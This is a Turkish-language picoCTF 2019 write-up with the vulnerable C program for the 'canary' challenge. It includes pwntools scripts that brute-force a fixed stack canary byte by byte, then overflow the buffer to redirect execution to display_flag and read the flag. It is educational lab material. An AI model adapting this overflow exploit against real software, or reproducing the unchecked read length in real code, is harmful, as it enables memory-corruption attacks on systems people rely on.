Kaynak bir c programında arabellek taşması ile kodun çalışmasını değiştirme. Flag.txt dosyasını okumaya çalışacağız. Ancak sabit bir canary değerini bruteforce yaparak bulmaya çalışacağız. Burada canary.txt den okunan canary değeri sabittir. Burada programı taşırıp(overflow) canary ekleyip programı display_flag fonksiyonuna atlatabilmek.

payload = ‘F’*32 + canary + ‘A’*0x10 + p32(0x566547ed)

Kaynak: picoctf 2019

Kaynak C Dosyası kodları vuln.c;

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>

#define BUF_SIZE 32
#define FLAG_LEN 64
#define KEY_LEN 4

void display_flag() {
char buf[FLAG_LEN];
FILE *f = fopen(“flag.txt”,”r”);
if (f == NULL) {
printf(“‘flag.txt’ missing in the current directory!\n”);
exit(0);
}
fgets(buf,FLAG_LEN,f);
puts(buf);
fflush(stdout);
}

char key[KEY_LEN];
void read_canary() {
FILE *f = fopen(“/problems/canary_6_c4c3b4565f3c8c0c855907b211b63efe/canary.txt”,”r”);
if (f == NULL) {
printf(“[ERROR]: Trying to Read Canary\n”);
exit(0);
}
fread(key,sizeof(char),KEY_LEN,f);
fclose(f);
}

void vuln(){
char canary[KEY_LEN];
char buf[BUF_SIZE];
char user_len[BUF_SIZE];

int count;
int x = 0;
memcpy(canary,key,KEY_LEN);
printf(“Please enter the length of the entry:\n> “);

while (x<BUF_SIZE) {
read(0,user_len+x,1);
if (user_len[x]==’\n’) break;
x++;
}
sscanf(user_len,”%d”,&count);

printf(“Input> “);
read(0,buf,count);

if (memcmp(canary,key,KEY_LEN)) {
printf(“*** Stack Smashing Detected *** : Canary Value Corrupt!\n”);
exit(-1);
}
printf(“Ok… Now Where’s the Flag?\n”);
fflush(stdout);
}

int main(int argc, char **argv){

setvbuf(stdout, NULL, _IONBF, 0);

int i;
gid_t gid = getegid();
setresgid(gid, gid, gid);

read_canary();
vuln();

return 0;
}

overflow (taşma) ile canary bulma için brute force scriptdeneme.py;

from pwn import *
def find_canary():
canary = “”

for n in range(0, 4):
for i in range(0, 256):
p = process(‘./vuln’)
check = ‘F’*32 + canary + chr(i)
p.readuntil(‘> ‘)
p.sendline(str(33 + n))
p.readuntil(‘Input> ‘)
p.sendline(check)
out = p.recvall()
print(check)
print(out)
if “Ok…” in out:
canary += chr(i)
print(canary)
break

print(“Canary Found: ” + canary.encode(‘hex’))
return canary
find_canary()

overflow (taşma) ile canary bulma ve payload oluşturma script.py;

Önce display flag adresini bulalım: objdump -D -Mintel vuln | grep display_flag

#! /usr/bin/env python2

from pwn import *

def find_canary():
canary = “”
for n in range(0, 4):
for i in range(0, 256):
p = process(e.path)
check = ‘A’*32 + canary + chr(i)
p.readuntil(‘> ‘)
p.sendline(str(33 + n))
p.readuntil(‘Input> ‘)
p.sendline(check)
out = p.recvall()

if “Ok…” in out:
canary += chr(i)
break

print(“Canary Found: ” + canary.encode(‘hex’)+canary)
return canary

def solve(canary):
flag_text = “”

#loop until the PIE address lines up enough to print the flag
while (“pico” not in flag_text):
payload = ‘F’*32 + canary + ‘A’*0x10 + p32(0x566547ed)
p = process(e.path)

p.readuntil(‘> ‘)
p.sendline(str(len(payload)))
p.readuntil(‘Input> ‘)
p.send(payload)
p.recvuntil(“Ok… Now Where’s the Flag?\n”)
try:
flag_text=p.recvuntil(“\n”)
except:
p.close()

print(“Flag: ” + flag_text)

context.log_level = logging.ERROR
e = ELF(“./vuln”)

canary = find_canary()
solve(canary)